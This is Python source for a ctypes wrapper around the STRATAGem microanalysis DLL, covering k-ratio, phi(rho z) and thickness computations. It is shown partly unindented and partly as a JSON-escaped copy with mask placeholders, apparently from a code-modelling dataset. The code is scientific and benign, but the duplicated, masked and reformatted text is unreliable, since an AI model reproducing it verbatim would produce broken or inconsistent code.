logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error("Cannot start iteration")
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
# Fetch results
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error("Cannot get number of elements")
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,
flag_, wfs_):
self._raise_error("Cannot get layer concentration")
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug("StSdGetThick(key, %i)", ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),
c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error("Cannot get thickness")
return (composition, thickness.value / 1e10,
mass_thickness.value * 10.0, density.value * 1e3)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
        * :math:`\\rho z` coordinates (in kg/m2)
        * generated intensities of :math:`\\phi(\\rho z)` (no absorption)
        * emitted intensities of :math:`\\phi(\\rho z)`
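
        Example (illustrative; ``exp`` is one of the defined experiments)::

            >>> przs = strata.compute_prz(bins=50)
            >>> rzs, generated, emitted = przs[exp]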
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
# Set scaling
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1e3)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)
self._lib.StSetScaleHV(maxhv_)
# Compute
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
# Get values
przs = {}
for experiment, indexes in self._experiments.items():
# Size of each bin
if maxdepth_m is None:
# Calculate max depth using Kanaya-Okayama
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1e3
for z, fraction in self._substrate[0].composition.items():
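                    # Kanaya-Okayama range of a pure element, in micrometers:
                    # 0.0276 * A[g/mol] * E[keV]^1.67 / (Z^0.89 * rho[g/cm3]);
                    # the sample range is the composition-weighted harmonic mean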
dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \
(z ** 0.89 * mass_density_kg_m3(z) / 1e3)
maxdepth_m += fraction / (dr * 1e-6)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5 # safety factor
increment_kg_m2 = (maxdepth_m * self._substrate[0].density_kg_m3) / bins
# Indexes
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
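                # the DLL expects the mass depth in g/cm2 (hence the 0.1
                # factor from kg/m2); rzs keeps the value in kg/m2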
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 'Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not 
self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if 
kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. 
If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-4": "<mask token>\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n\n\n class winreg:\n HKEY_CURRENT_USER = None\n\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import atomic_mass_kg_mol, mass_density_kg_m3\n_REGISTRY_KEY = 'Software\\\\SAMx\\\\Stratagem\\\\Configuration'\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\nPRZMODE_XPP = 0\n<mask token>\nPRZMODE_PAP = 1\n<mask token>\nPRZMODE_GAU = 2\n<mask token>\nFLUORESCENCE_NONE = 0\n<mask token>\nFLUORESCENCE_LINE = 1\n<mask token>\nFLUORESCENCE_LINE_CONT = 2\n<mask token>\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\n\ndef _check_key(method):\n\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. 
If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n logger.debug('StObjectNew(key, %r, %i)', not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error('Cannot create object')\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. 
Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear()\n self._substrate = None\n self._experiments.clear()\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m, layer.\n mass_thickness_kg_m2, layer.density_kg_m3)\n return sample\n sample = property(get_sample, set_sample, doc='Property to set/get sample')\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. 
\n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. 
hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error('Cannot set geometry parameters')\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n geometry = property(get_geometry, 